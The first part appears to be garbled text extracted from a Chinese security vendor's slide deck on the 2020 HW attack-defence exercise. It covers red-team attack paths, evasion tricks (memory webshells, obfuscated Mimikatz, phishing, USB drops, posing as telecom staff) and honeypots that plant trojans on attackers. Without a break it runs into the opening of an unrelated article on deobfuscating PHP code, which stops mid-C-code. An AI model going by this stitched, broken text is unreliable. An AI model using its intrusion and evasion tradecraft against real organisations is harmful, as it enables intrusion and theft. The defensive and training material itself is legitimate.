提交0Day漏洞有加分,有上限;  被溯源/反制的攻击队将被扣分。 护 网 的 起 源 和 演 变 — 防 守 方 简 要 计 分 规 则 ( 参 考 ) 低 高 账号权限 主机权限 重要系统权限 权限获取 边界突破 靶标系统 逻辑隔离 物理隔离 生产网 目标系统 核心业务 核心数据 高 计分注意事项 发现并处置攻击,提交报告 可加分,但加分小于扣分; 溯源攻击者身份可额外加分, 反制攻击者也有加分;  总结报告分数有一定占比。 攻击方得分则防守方失 分 护 网 的 起 源 和 演 变 — 新 形 势 下 攻 防 对 抗 HW小插曲(木桶短板): 目标数据库系统经测试无任何安全隐患,渗透过程中发现测试环境数据库账号(密码)明文存 储,经测试和目标数据库系统账号(密码)一致,导致目标系统被攻陷。 1. 发现真实攻击的能力; 2. 应对真实攻击的能力。 防护 人员 流程 技术 体系 组织 制度 措施 验证体系变化的影响 通过攻防实战的形式,验证点、线、面的安全性,实实在在地提升安全对抗能力。 护 网 的 起 源 和 演 变 — 2020攻 防 演 练 变 化 • 防守方发现种类由8种变成3种; • 溯源得分需要在攻击成功之后。 类 别 • 防守报告上限 50 次; 报 告 • 总结报告得分减少由2000分变为1000分; • 不提交总结报告扣1000分。 • 增加沙盘推演、DDOS攻击; • 优化各个细节更贴近实战环节。 流 程 优秀攻击队 攻击联队 重要行业代表 防守方 沙盘推演: 护网最优秀的攻击队组成联合攻击队对重要行业攻击情 况展开沙盘推演,每个行业代表现场需要进行两轮沙盘推演: 过程包含了方案推演、方案置辩、补充建议等。防守方在正 式开始时才会得到攻击联队的攻击方案,需要现场制定防守 方案、应对措施,陈述对应的防守方案。 参演单位出席嘉宾包含了行业相关院士专家、公安部相 关领导、直属行业部委级领导、相关行业同业嘉宾等。 规则 沙盘推演 未知攻,焉知防 —说说攻击队的那些 事 PART 2 长 亭 红 队 简 介  突破边界 20+;  批量获取服务器权限100台以上 15+;  拿下靶标/控制核心生产系统/获取核 心业务数据 10+;  预备0Day:30+;  定制化工具:10+;  获评“军火商”级别(TOP 2)。 Target 爱好者级别 以网络攻防为业余爱好 民兵级别 利用1Day和nDay打击目标 APT级别 利用漏洞渗透,埋伏,移动,获得 权限,拿下目标 核武器/军火商级别 使用大量0Day攻击 0 1 0 2 0 3 0 4 长亭攻防演习2020成绩单 长亭科技-对抗能力储备 • 各种 VPN 0day • Coremail 邮箱 0day • VMWare ESXi 虚拟机逃逸 • SQLite 击溃全线浏览器(含移动) • 帆软、致远、泛微 OA 等 RCE • Firefox/Safari 远程代码执行 • 思科防火墙远程代码执行 • gitlab/bitbucket 远程代码执行 • Windows/macOS/Android 本地提权 • 即时通信软件远程代码执行 • 等等... 攻防演练案例分析-常见攻击路径 1. 外网 – DMZ服务器 – 核心区服务器 – 核心网 2. 外网 – DMZ服务器 – 运维管理/监控agent – 管理端 – 重要服务器 3. 外网 – DMZ服务器 – 安全设备agent – 管理端 – 重要服务器 4. 外网 – DMZ服务器 – 域控 – 多网卡机器 – 堡垒机 – 核心网服务器 5. 外网 – DMZ服务器 – 虚拟机逃逸 – 云管理平台 – 重要系统 6. 外网 – 内网终端 – 域控 – 开发/运维终端 – 堡垒机 – 核心网服务器 7. 外网 – 内网终端 – OA/SSO等服务器 – 运维终端 – 重要系统 8. VPN – 域认证信息 – 邮箱系统 – 翻取网络拓扑/账号密码 – 重要系统 9. 外网 – 第三方内网 – 第三方专网 – 目标核心网 Round 1: 1. 利用VPN 0Day 拿下VPN服 务器权限 ,并建立内网代 理;通过db文件获取内网资 产表; 2. 拿下某服务器作为持久化据 点; 3. 同时发现VPN可直通核心, 直击重要系统时被防守方察 觉,防守方采取应急措施进 行封禁,VPN入口丢失。 防守应急 补丁更新 下线特权账号 关闭/替换VPN 攻 防 演 习 案 例 — 上 帝 视 角 Round 2: 1. 在持久化机器被发现 前火速进攻,从该机 器发现HIDS agent; 2. 通过agent攻破HIDS 服务端; 3. 
利用服务端向agent端 下发命令控制重要服 务器,最终通过迂回 的方式,成功控制重 要系统。 攻 防 演 习 案 例 — 上 帝 视 角 Round 1: 通过搜集邮箱账号,进行第一轮广撒网式钓鱼,由于发送数量较多,被防守方发现并进行了内部邮件 通报,第一次钓鱼攻击失败; 攻 防 演 习 案 例 — 另 辟 蹊 径 ( 社 会 工 程 学 ) Round 2: 以 “警惕钓鱼邮件”为主题伪造钓鱼邮件,针对少量特定用户进行第二轮定向钓鱼,成功拿下一名员工PC 权限; 以此为入口,先攻破OA服务器,然后在OA首页进行挂马钓鱼,钓鱼成功后打入运维人员PC机翻阅敏感 文件,从而控制堡垒机,进而夺取重要系统; 攻 防 演 习 案 例 — 另 辟 蹊 径 ( 社 会 工 程 学 ) 攻 击 技 战 法 — 攻 击 流 程 与 核 心 要 素 剖 析 初始信息收集 初始入侵 站稳脚跟 提升权限 内部信息收集 完成目标 横向移动 维持权限 攻击流程 核心要素 1 . 信 息 是APT攻击的第一生产力,贯穿APT攻击的整个生命周期,优秀的情报能力可以令攻击 事半功倍; 2 . 漏 洞 是撕开防线的武器,需要依靠信息精确制导; 3 . 工 具 主要包括远控,日志、流量、密码窃取等后渗透工具。 攻 击 技 战 法 — 动 态 对 抗 , 从 信 息 持 续 追 踪 开 始攻防的信息搜集: 01 02 03 04 提前搜集200+ 可能参演单位 的资产, IP、 域名、人员信 息等; 对资产进行跟 踪, 针对临时 新增资产, 辅 助进行蜜罐识 别; 识别资产指纹 ( cms 、 第 三 方系统、组件 中间件等), 以便进行漏洞 利用; 围绕特定人员 搜集信息, 以 供社工钓鱼; 05 理解业务, 了 解并选择潜在 的攻击路径。 攻 击 技 战 法 — 信 息 为 王 , 突 破 办 公 系 统 提前储备相关0Day或 1day,可供外网突破或 内网深入; 突破成功后,查找账号密码、 跳板机、网络拓扑、重要系 统位置等敏感信息; 也可结合用来进行内网 社 工钓鱼。 OA/邮箱: 攻 击 技 战 法 — 攻 陷 VPN, 打 开 ” 上 帝 视 角 “ VPN: 攻 击 技 战 法 — 打 破 隔 离 , 直 上 云 端 虚拟机内部逃逸 管理平台 虚拟化: 攻 击 技 战 法 — 擒 “ 贼 ” 先 擒 “ 王 ” , “ 擒 拿 ” 特 权 系 统 安 全 设 备 不 安 全 。 安全/运维/监控设备:  提前储备相关0Day或1day,可供内 网 横 纵 向 扩 展 利 用 ;  一般以server端 控 agent端 ,或者先从agent打到server,再打其他agent的形 式;  攻 击 技 战 法 — 摸 排 供 应 链 , 实 施 精 准 打 击 供应链上的系统漏洞:  针对特定行业,常用特定软件或者系统进行一定储备和了解;  面对临时发现的第三方系统,可采取寻找源码,现场审计挖0Day的方式攻击。 攻 击 技 战 法 — 欺 骗 的 艺 术 社工钓鱼:  针对人员信息,发送特定主题的钓鱼邮件,如补丁 更新、投诉举报、简历投递、安全演习通告等;  伪装成电信人员进入对方机房检查网络,将笔记本 通过网线接入内网直接开始渗透;  进入目标单位办公区,趁保安不注意向无人值守的 办公电脑植入远控木马;  往目标单位附近投放大量U盘,U盘上带有单位 logo 诱骗员工拾取并插入办公电脑。  …… 攻 击 技 战 法 — 工 欲 善 其 事 , 必 先 利 其 器  扫描器,进行全面信 息搜集及资产跟踪;  一键化漏洞利用工具, 简化打点、突破流程, 节约时间。 外网  自动化信息搜集脚本;  常见漏洞利用/提权/持 久化的一键化脚本或 工具。 内网  通用工具+定制化插件, 重点漏洞exp;  预备免杀木马与对抗 性脚本payload。 远控与免杀 攻 击 技 战 法 — 对 抗 防 守 , 躲 避 检 测 , “ 形 人 而 我 无 形 ”  基 于 规 则 的 WAF可使用语 法 和协 议 变 形 等技巧绕 过 ;  优先使用无 文 件 的 内 存 马 进 行 控 制 , 绕 过 HIDS/EDR检 测 ;  使 用 加 密 信 道 传 输 数 据 和 控 制 权 , 使 用 端 口 复 用 技 术 藏 匿 流 量 ;  切 忌 内 网 大 规 模 扫 描 , 特 别 是 对 4 4 5 、 3 3 8 9、22这些敏感端口,优先 利用企业资 料、网络连接信息、历史登录信息进行横向扩展;  对工具进行代 码 混 淆 ,并做免 杀 处 理 (CS、 Mimikatz等);  入 侵 系 统 后 , 将 通 过 漏 洞 利 用 对 系 统 进 行 控 制 的 方 式 , 转 为 常 规 运 维 访 问 (如ssh登录,或使用运维平台下发命令),以 维 持 权 限 。 攻 击 技 战 法 — 总 结 外部信息收集 内部信息收集 初始入侵 维持权限 VPN 邮箱 OA 运维管理系统、信息类业务系统 常用框架 基础组件 虚拟化平台 域控 本机历史记录 网络连接信息 隐藏隧道免杀技术 安全检测绕过技术 分(子)公司 业务系统 供应链 攻 击 技 战 法 —攻 防 技 战 法 的 演 进 :2019 vs 2020 攻 防 两 端 博 弈 , 平 均 能 力 提 升 明 显 。 2019 2020 攻击队 防守队 攻击队 防守队 应对手段粗暴 关停 应对手段更针对性 精准发现攻击能力 溯源反制能力 nDay漏洞利用 漏洞储备丰富 自研工具特征隐蔽 开源工具特征明显 漏洞储备较少 开源工具特征明显 内网渗透手法粗糙 封禁IP 真实攻击发现能力较弱 尚未具备反击能力 通用组件 网络 安全 攻击战术多元化 内网渗透手法细腻 网络隔离 分析取证 关停 封禁IP 隐蔽隧道 绕过安全检测 实战出真知 —长亭2020防守纪 实 PART 3 长 亭 产 品 服 务 体 系 雷池(SafeLine)下一代 Web 应用防火墙 采用前沿的人工智能语义分析算法,能够基于上下文逻辑 实现攻击检测,提升准确率,降低误报率。 谛听(D-Sensor)伪装欺骗系统 利用欺骗伪装技术,解决内网防护难以察觉、难以明确、 难以追溯三大问题,赋予内网全新的主动对抗能力。 洞鉴(X-Ray)安全评估系统 集资产管理、Web 扫描与主机扫描为一体,帮助企业全面 封堵因漏洞带来的安全风险。 牧云(CloudWalker)主机安全管理平台 基于 Agent 的深度服务器工作负载安全平台,帮助企业提 升资产能见度并有效防御入侵。 安全服务体系 • 咨询(等保咨询、安全攻防能⼒成熟度评估) • 建设(HW专项主防、红蓝对抗) • 检测(渗透测试、基线检测、代码审计) • 应急(应急响应) • 保姆式服务包(全年),包含⽇常、专项、应急、 重⼤保障等服务。 雷池 精准识别,拦截来自 Web的大量攻击 一定的0day防御能力, 后端快速响应 即插即用,业务无影 Web攻击防护难点 强大的解码能力 智能语义分析 无需维护规则库 开放API &日志外发 雷池防护效果 全面/灵活的部署模式 变种攻击多样,载荷隐蔽, 难以发现 高级攻击手法使用率高, 甚至0day攻击频发 传统WAF规则调优难度 大、耗时久,效果难达预 期 系统封闭,难以融入自动 化处置体系 ! " # $ % & ' ( ) * + , - ' . 
/ 0 响迅速开启实战拦截 完美嵌入安全体系, 实现自动化封禁 适配多种网络架构, 各行业实践丰富 长亭WAF核心能力  真实攻击场景:  外⺴部署溯源蜜罐,在攻击者资产搜集阶段 获 取其真实信息,溯源攻击者,上报威胁;  赋予内⺴⾼密度的威胁感知与欺骗伪装能⼒, 让进⼊内⺴的⾼级攻击团队步⼊迷宫、⽆所 遁 形;  溯源站点数量达33种,业界最多;  ⽀持蜜罐定制化需求,需根据实际情况核算。  部署便捷:⾮侵⼊式架构,⽀持实体机、虚拟机、 云 主机,迅速覆盖重要区域  部署位置:在不同安全域部署监测节点,可通过各 节 点对未分配使⽤ IP 地址进⾏全⾯覆盖 长亭蜜罐核心能力 以攻击视角评估安全风 险 洞鉴-解决之道 洞鉴(X-Ray)以攻击者视角评估用户系统的安全风险, 依托自有安全团队的实战经验,采用识别+验证的方式, 精准发现漏洞风险,并为用户提供资产漏洞生命周期管 理功能。 04 03 02 01 详细记录漏洞信息、影响范围 和处理建议,通知用户及时修 复 根据资产特征匹配漏洞PoC, 验证漏洞是否存在 通过端口扫描和爬虫获取详细 的资产信息 通过主动扫描和被动分析模式, 收集IP、域名/URL资产信息 信息收集 扫描查点 攻击提权 清理痕迹 定位 辅助用户内网安全风险评 估的专业工具 精准发现高危漏洞 详细提供处置方法 追踪漏洞生命周期 完美嵌入安全体系  牧云极强的反入侵能力帮助防守方第一时间 感 知主机层面威胁  多种入侵行为感知  网络攻击链检测  攻击队入侵到主机我们能 发 现么?  利用跳板还可发动更多攻击!  如何获取至关重要的服务 器 内部安全监测视角?  形成完备的现网主机风险画 像 风险事件聚合关联 建立主机风险画像 主机安全的统一管理 Web后门 检测 反弹Shell 识别 后门程序 感知 敏感文件 修改 异常进程 异常登录 暴力破解 WebShell 恶意文件 敏感文件 权限异常 异常命令 长亭牧云主机管理系统核心能力 防 守 整 体 数 据 — 防 守 工 作 其中,91家单位选择了长亭科技的专家 值守服务。所有服务项中,安全设备占比42%, 专家值守占比35%,专家值守占所有安全服务 60%,为长亭科技此次演习主要服务内容, 长亭科技共为8家单位提供了主防值守工作。 攻防演练人员工作项 支持单位数量 单位数量占比 安全调研 8 5.7% 资产梳理 11 7.9% 安全体检 15 10.7% 策略布防 14 10.0% 攻防演练 14 10.0% 专家值守 91 65.0% 安全设备 112 80% 安全调研 资产梳理 3% 4% 安全体检 6% 策略布防 5% 攻防演练 5% 专家值守 安全设备 安全调研 资产梳理 安全体检 策略布防 攻防演练 专家值守 安全设备 工作内容 此次攻防演习,长亭科技投入全体安全 服务人员参与演习行动,为140家单位提供防 守工作支持。 长亭科技主要提供了安全防护产品服务 以及安全调研、资产梳理、安全体检、策略布 防、攻防演练、专家值守六项安全服务。助防 服务覆盖备战、防守各个阶段。 现场值守 防 守 整 体 数 据 — 防 守 工 作 与 人 员 投 入  24小时专人驻场服务;  安全日志分析与事件处置;  综合研判与溯源分析;  处置报告编写。 专家值守 二线支持  威胁情报;  高级专家研判支持;  溯源支持; 攻防演习人员投入情况 人员投入情况(人) 人/天 工作模式 防守现场 主防 71 2651 7*24 协防 262 4810 7*24 7*12 合计 333 7461 二线支持 10 1120 7*24 7*12 总计 343 8581 攻防演习期间,专家值守工作分设 防守现场、二线协防双层保障机制,保 证防守效果。 值守工作人员投入  所有值守工作共投入343 人, 使用 8581人天;  主防值守投入人员占比21%,人天占 比31%; 防 守 整 体 数 据 — 长 亭 产 品 数 据 攻防演习期间。共有115家单位部署以上长亭科技安全产 品。其中以蜜罐和WAF产品最多。 部署单位涉及金融、能源、基建、交通等多领域,其中金 融、能源、通信、政府单位占较大比例,共达90%左右。 产 品 投 入 分 布 此次攻防演习,长亭科技安全产品投入如下: 雷池(SafeLine)下一代Web应用防火墙 谛听(D-Sensor)伪装欺骗系统 洞鉴(X-Ray)安全评估系统 牧云(CloudWalker)主机安全管理平台 全流量(TrafficAnalysis)流量分析预警系统 87 14 9,6.4% 8 0 20 40 60 80 100 雷池 洞鉴 蜜罐 牧云 全流量 长亭产品部署单位数量 120 112 金 融 能 源 21% 通 信 14% 政 府 14% 演习期间—长亭产品部署行业分 布 基建 金融 通信 制造业 互联网 交通 能源 政府 物流 军队军工 设备部署软硬件超过400台套; 默认防护:37个; 添加策略:50个; 设备部署软硬件149套; 谛听告警总计1000w+; 溯源信息数量2000余 条(捕获到IP或 账号信息); 防 守 整 体 数 据 — 长 亭 产 品 数 据 产 品 运 行 情 况 单日处理请求总数:120亿 次; 攻击发现次数:1.7亿 次; 漏报率:<0.73%,误报率<0.87%; 0Day:120个。 溯源成功的人数 500余 人(通过IP或账号信息确认真实身份); 溯源成功命中了攻击队10%(定位到攻击队成员并提供攻击证明,上 报得分); 反制成功命中了攻击队2%(反控攻击队PC并得分)。 弱口令:SSH、MySQL、Redis。20000+,生产 环境 4000+ 应用漏洞:shiro、fastjson、Jackson 等1000+ WebSHELL:100+ 反弹SHELL:10+ 恶意命令执行:200+ 攻防演习期间总共部署探针约 20000 点; 弱口令: SSH、MySQL、Tomcat、FTP 等3000+ 高危系统漏洞:100+ 应用漏洞:WebLogic:60+:心脏滴血:100+;Shiro: 30+、Fastjson:400+ WebSHELL:40+ 恶意命令:30+ 87家 9家 112家 某 银 行 某 金 融 单 位 防 守 整 体 数 据 — 攻 防 演 习 二 线 协 防 情 况 溯源情况分布 59, 20% 溯源成功 溯源失败 237, 80% 协 防 支 持 流 程 0 500 1000 1500 9.11 9.12 9.13 9.14 9.15 9.16 9.17 9.18 9.19 9.2 9.21 9.22 9.23 9.24 协 防 支 持 成 果 • 积极响应多种溯源请求 攻防演习期间二线共收到溯源请求296条,其中文件请求13条,IP 溯源请求达189条。 • 精准溯源,及时共享 成功溯源237条,成功率达80%。并及时分享数据、响应同源请求。 • 多方采集,汇集情报 累计采集到可疑IP 1814条,支撑一线防护策略部署。 • 有效溯源工作,支撑多次防守和反制 溯源成功加分案例3个,其中两个为钓鱼邮件,一个为VPN反制。 溯源反制案例达10+个。 可疑IP数量分布 • 防守现场协防接口人:负责协防支持对接; • 防守现场情报接口人:负责情报上报工作; 由协防数据可知,二线协防工作对前场防守起到了 非 常重要的支持作用。 十 大 防 护 技 战 法 —1. 攻 防 能 力 评 估 与 建 设 规 划 长 亭 主 防 服 务 体 系 十 大 防 护 技 战 法 —2. 高 度 重 视 , 全 员 参 与 人是护网项目最核心的要素! 团队之间不团结,推卸责任。 存 在 问 题 : 解 决 方 案 : 1 高层不重视,事情推不动; 1 高层领导重视是前提条件; 2 跨部门协调流程多,效率低; 2 跨部门团结合作是必备条件; 组建临时项目组,覆盖测试、开发、应用、运维 多个部门领导与技术人员,提前2个月开始准备; 3 3 全员动员,提高整体的安全意识。 4 十 大 防 护 技 战 法 —3. 
资 产 梳 理 &资 产 定 位 洞 鉴 ( X-Ray ) 具备主 机 服 务 、综 合 Web 探 测 和被 动 探 测 引 擎 , 提 供 主 机 系 统 、 Web应 用 和域 名 的 多维度资产信息发现功能,完成 以攻助防中资产的全面检测,且 可以对 接 内 部 的 资 产 管 理 软 件 CMDB; 一切从资产开始! 牧 云 (CloudWalker)主机安全管理平台通过部署在主机上的 agent 对 资产信息进行全面采集,可 发 现 主 机 、 数 据 库 、 Web资 产 、 应 用 、 进 程 (进程名、进程路径、PID、用户等)、容 器 (Docker镜像和 Docker容器)等多种类型资产,全 面 掌 握 系 统 版 本 信 息 、 网 络 接 口 、 软 件 应 用 类 型 等 内 容 ,再通过外部数据源同步,建立包含设备 属性、时间属性、空间属性、责任人属性等详尽的资 产 指 纹 信 息 ,让企 业管理者拥有一张全面的、清晰的、详尽的资 产 图 谱 ,满足多种资产管理 场景; 人 工 方 式 ,从开 始 到结束,不 间 断 盘 点 、 跟 踪 、 核 查 与 确 认 ,如梳理防火墙 配 置 、 回 收老 旧 资 产 、 登记新上资产等。 存在问题: 1. “理 不 清 ” : 边 缘 资 产 、 老 旧 资 产 、 未 知 资 产 ; 2. “管 不 清 ”:管理边界不清晰,未统一管理,不同资产不同对接人, 开放端口管理不严格。 目标: 发 现 异 常 IP告 警 ,能够五 分 钟 内 ,定 位 到 该 IP对应的 资产在位置、具体到哪个机架、哪个办公桌。 实现手段: 1 2 3 十 大 防 护 技 战 法 — 4.攻 击 面 收 敛 &网 络 隔 离 A 评估准备 B 评估实施 评估加固 A • 网络拓扑图 • 防火墙ACL列表 • 资产列表 • 常见攻击路径图 B • 安全域划分 • 安全域隔离及访问控制措施 • 攻击面评估 • 入侵防护措施 C • 安全隔离 • 攻击面收敛 工作目标 通过网络架构评估,明确整体网络安全域划分、梳理域间/域内访问控制关系、评估攻击面及入侵防护情况,最终实现网络 隔离及攻击面收敛。 传统做法:停留在理论和要求阶段,缺乏有效的系统评估步骤、评估重点及验证手段。 长亭优势:基于HW实战经验及案例,明确评估重点及优先级,通过具体实施流程及方法,实现上述目标,并在实际主防项目中 取得良好的防护效果。 C 十 大 防 护 技 战 法 — 4.攻 击 面 收 敛 &网 络 隔 离 第三方机构 WiFi VPN 邮箱 外网IP、端口 外网应用系统 办公终端 运维终端 集权系统 靶标系统 分支机构 攻击面评估 老旧资产 访问控制及入侵防护评估  评估准备  网络拓扑:网络拓扑图,包括安全设备、网络设备、IP地址等信息。  资产表:详见资产梳理。  防火墙策略:防火墙上的ACL及NAT列表。  网络攻击路径:基于实战经验梳理的常见网络攻击路径,未知攻,焉知防。  评估实施  网络安全域划分:明确安全域划分原则及业务分布,其中靶标系统所在安全域、开发 测试区、互联网DMZ区、运维管理区、第三方外联及专线区、办公区等,需重点关注。  访问控制关系:明确域间及域内访问控制关系,同时,梳理防火墙访问控制列表及 NAT列表,绘制可视化访问关系及入侵防护图谱。  攻击面评估:根据资产表及常见攻击路径,梳理内、外网易受攻击资产,明确攻击面 风险。  入侵防护评估:根据网络拓扑及攻击面,梳理入侵防护现状及风险,包括安全措施和 安全设备覆盖度。  评估加固  网络隔离:通过发现的问题,基于权限、端口、服务、访问最小化原则,加强内外网 隔离、安全域间/域内隔离及收敛访问关系,并通过工具进行验证,如内外网端口扫描、 NAT列表定期审查。  攻击面收敛:资产迁移、老旧资产下线、定时开关、统一互联网出入口、增强防护措 施(双因素认证、安全设备部署、统一身份认证等)等 十 大 防 护 技 战 法 —5. 安 全 体 检 30000+ 2000+ 140+ 资产监控 风险识别 专项检查 推动整改 整改验证 十 大 防 护 技 战 法 —6. 安 全 意 识 提 升 、 钓 鱼 防 护 、 防 社 工 技 术 防 护 管 理 手 段 攻 击 者 视 角 防 御 者 视 角 社 会 钓 工 鱼 程 学 物 理 攻 击 安全邮件网关 上网行为管理 终端杀毒管理 WiFi二次认证 虚拟桌面管理 相关人员统一着装 内外网办公分离 邮件钓鱼 电话钓鱼 WiFi钓鱼 安全意 识提升 培训 员工绩 效考核 挂钩 安全意 识仿真 检测 安全意 识宣传 海报 Badusb攻击 移动WI-FI攻击 伪装内部人员获取敏感数 据 十 大 防 护 技 战 法 —7. 边 界 防 护 、 0Day防 护 边界防护是重中之重! 存在问题: 1 . 边 界 防 护 范 围 覆 盖 不 全 ,如没有统一的流量入口、加密 流量 监控不到; 2 . 防 护 维 度 不 够 , 如 没 有 应 用 层 的 监 控 ; 3 . 安 全 设 备 检 测 细 粒 度 不 够 ,海量告警数据,没有贴合 业务场景进行防护; 4 . 第 三 方 、 子 公 司 、 分 支 机 构 接 入 不 设 防 ; 5 . 高 风 险 、 重 点 资 产 防 护 不 到 位 ,如对外的VPN、邮件 系统等。 目标: 常 规 攻 击 无 法 突 破 边 界 防 护 , 0Day攻 击 第 一 时 间 发 现 。 实现方式: 重 点 资 产 重 点 布 防 , 实 现 二 次 认 证 、补 丁升级、流量监控、主机监控、严格网络隔 离;HW前 收 集 0Day情 报 , 设 置 针 对 性 安 全 策 略 ;护网期间,对接阿 里 情 报 库 联 动 。 将 “ 第 三 方 、 子 公 司 、 分 支 机 构 ” 视 为 不 可 信 实 体 , 对交互流量进行统一监 控; 安 全 规 则 优 化 , 消 除 误 报 , 贴 合业务; 安 全 设 备 部 署 , WAF、网页防篡改、邮 件网关、APT、HIDS、 EDR等;加密流量卸载; 入 口 收 敛 , 统 一 入口,将各个应用的 通过公有云做代理后, 再访问服务器; 1 2 3 4 5 VPN网关 防火墙 网 络 防 护 边 界 子 公 司 、 第 三 方 雷池(WAF) 谛听(蜜罐) 牧云(HIDS) 洞鉴(漏扫) 网页防篡改 业 务 区 EDR系统 态势感知 安 全 运 营 区 网络层 边界防护 全流量分析 应用层 边界防护 主机层 内部防护 抗DDoS IDS/IPS 邮件网关 系统 0Day 子公司 不设防 网络入口 不收敛 威胁情报 反弹Shell 持续日志监控耗费人力 不同设备告警存在差异性 单一告警的准确性存疑 无法通过分析排查风险IP 不同厂商设备联动性差 难以汇总上下级单位数据 监控人员能力参差不齐 需要全人工分析处置事件 十 大 防 护 技 战 法 —8. 
自 动 化 运 营 核 心 运 营 痛 点 在攻防对抗中,防守方往往需要部署大量监控手段以应对各个方向的攻击。与此同时大量增加的安全设 备以及监控手段会带来额外的监控分析人力成本。通过传统的铺人战术并不能有效的将安全能力最大化,反而因 为协作中的问题带来更大的隐患。  接 入 日 志 : 将 可 靠 的 WAF、 webIDS、 邮 件 沙 箱 、 IPS、 全 流 量 、 HIDS、 EDR等安全设备日志和系统应用日志,接入部署的日志平台ELK、 splunk、 日 志 易 进行集中监测、分析;  策 略 制 定 : 优 化 接 入 设 备 的 告 警 准 确 性 , 针 对 性 加 入 监 控 规 则 , 如 : VPN登 录 失 败 、 SQL注 入 、 反 序 列 化 攻 击 、 登 录 失 败 事件;  自 动 封 禁 : 联 动 防 火 墙 、 CDN、 账 户 系 统 对异 常 IP、 账 户 进 行自动封禁; (需要确保防火墙部署情况 负载情况以及设备是否可以获取真实IP) 攻击者IP资源,可有效打击攻击者的积极性。 44 29 121 121 134 133 131 202 133 98 67 10 13 36 15 32 11 21 29 27 29 24 14 15 8 10 11 7 0 50 100 150 200 250 2020-09-11 2020-09-12 2020-09-13 2020-09-14 2020-09-15 2020-09-16 2020-09-17 2020-09-18 2020-09-19 2020-09-20 2020-09-21 2020-09-22 2020-09-23 2020-09-24 自动化体系构建 高效事件处置 某防守单位事件处置趋势变化 自动处置数量 人工处置事件工单  快 速 封 禁 :防火墙 5 秒 内快速完成封禁生效、CDN 2 分 钟 内完成封禁生效;  关 注 重 点 : 可 以 通 过 自 动 封 禁 将 无 意 义 的 互 联 网 扫 描 、 僵 尸 网 络等无需特别关注的事件进行自动处置,监控与处置人员可以 将注意力放在更为严重的事件中,避免攻击者使用大量IP资源 进行声东击西;  干 扰 攻 击 者 : 由 于 自 动 封 禁 可 以 快 速 响 应 封 禁 攻 击 者 I P,消 耗 十 大 防 护 技 战 法 —8. 自 动 化 运 营 准 演 客户 安全服务 产品研发/技术支持 备阶段 选择1-3个需要做成蜜罐的业 务系统 为每个系统提供2-4个域名和IP, 解析/绑定到真实业务系统上 准备部署所需资源。 设计伪装欺骗方案 制作和散布诱饵 设计和制作免杀木马 根据客户的需求和安服的设计制 作蜜罐 部署伪装欺骗环境,放置虚假数 据 练阶段 在演习开始后,切换域名/IP, 指向蜜罐 反制攻击者,提交报告 维护木马 调整策略 维护蜜罐 反制蜜罐培养策略 最终目标:混淆攻击者收集的目标信息,提高捕获攻击者的概率 十 大 防 护 技 战 法 —9. 溯 源 与 反 制 反制解决方案:在提升溯源能 力的同时,增加了反制能力, 攻击反制成为HW的得分利器。 暴 露 吸 引 下载安 装 插入木马 VPN客户 端 文档 登 录 控 件 其他安 装 包 攻 击 者 蜜 罐 系 统 种植木马 反 制 上 线 反制服务器 安服专家 攻击反制 远程 监 控 收 集 信 息 真实系统 域名A 域名B 域名C 搜索引 擎 收 录 收 录 收 录 诱饵域名 十 大 防 护 技 战 法 —9. 溯 源 与 反 制 某大型国企 在DMZ区、运维区、服务器区 部署高中低交互混合的蜜罐 攻击者A发起攻击, 安装VPN客户端 综合情报 提交报告 得分3000 攻击者B在运维区横 向移动 触碰探针 谛听及时告警 分析判断 快速处置 没有丢分 触发反制木马 触发溯源机制 远控攻击者主机 获取帐号信息 十 大 防 护 技 战 法 —9. 溯 源 与 反 制 十 大 防 护 技 战 法 —10. 内 网 入 侵 检 测 在关键资 产部署牧 云探针 开启牧云 微蜜罐 定义监听 端口 接受网络 流量 牧云上报 蜜罐诱捕 事件 网络流量 转发至谛 听探针 攻击者踩 入高交互 蜜罐环境 实现全量 主机伪装 欺骗 牧云微蜜罐+谛听联动 虚 实 结 合 , 全 面 覆 盖 , 精 准 溯 源 , 让 攻 击 者 无 处 可 逃 Thanks
1 浅谈PHP源代码保护⽅案&受保护PHP代码の解 密还原 前⾔ PHP 加密⽅案分析 ⽆扩展⽅案 源代码混淆 ⼿⼯解密 ⾃动化通⽤解密 PHP扩展⽅案 源代码混淆 ⼿⼯解密 ⾃动化通⽤解密 opcode 还原代码 附录 PHP扩展编译 总结 参考 php是⼀种解释型脚本语⾔. 与编译型语⾔不同,php源代码不是直接翻译成机器语⾔.⽽是翻译成中间代码(OPCODE) ,再由解释器 (ZEND引擎)对中间代码进⾏解释运⾏ . 在php源代码的保护在原理可以分为3⼤类. 源代码混淆(编码) OPCODE混淆(编码) 修改解释引擎(虚拟机) 前⾔ ● ● ● 2 在部署上可以分为2⼤类. ⽆扩展 有扩展 下⾯分析下各种加密⽅案的实现⽅法 ⽆扩展的加密在⼀些⼩开发者⽐较常⻅。 这种源代码保护⽅式侵⼊性⼩,⽆需对服务器做额外的配置,兼容性较强。 这种情况混淆后的源代码还原⾮常简单,可完全还原出源代码。 有时连注释都会保留 (x 我觉得这种混 淆都不能称之为加密 基本流程 压缩代码->混淆变量函数类名->使⽤简单函数和⽅法进⾏编码加密 例:base64 异或 看到这种的php不要慌 这种处理后的⽂件 解密流程的变量和函数名使⽤了⼤量的⾮打印字符 按照正常 的流程就可以 ctrl+alt+l 快捷键 格式化代码 (这⾥使⽤的PhpStorm 其他IDE 格式化遇到特殊符号可能出问题 这⾥提前 调整好了⽂件编码) ● ● PHP 加密⽅案分析 ⽆扩展⽅案 源代码混淆 ⼿⼯解密 3 这⾥有⼀个php的特性 php中的base64遇到⾮base64表中字符会直接忽略 不会影响解码 注: PHP7 遇到空字符可能会抛出error 可以使⽤php5.6执⾏ (这⾥有⼀个兼容性问题 ) 遇到这种加密最简单的⽅法就是找⽂件中最后⼀步执⾏的函数 直接把内容打印出来 4 这种编码⽅法最后⼀步肯定要使⽤eval执⾏还原后的php代码 所以打印最后⼀个函数基本上php代码就 会全部出来 (x 前⾯操作⼀⼤顿毫⽆卵⽤ 注: 有保护⽅案也使⽤了call_user_func或call_user_func_array间接调⽤eval 成功还原源代码 <?php phpinfo();?> ⾃动化通⽤解密 5 PHP提供了强⼤的扩展功能 可以直接通过编写php扩展hook eval相关函数 获取执⾏的源代码 HOOK php zend引擎的 zend_compile_string zend_include_or_eval 函数达到⽬的 这⾥演示的是 hook zend_compile_string 函数 6 C 复制代码 /* $Id$ */ #include "php.h" #include "ext/standard/info.h" static zend_op_array* (*old_compile_string)(zval *source_string, char *filename TSRMLS_DC); static zend_op_array* evalhook_compile_string(zval *source_string, char *filename TSRMLS_DC) { if(strstr(filename, "eval()'d code")) { printf("\n------eval-------\n%s\n------eval------- 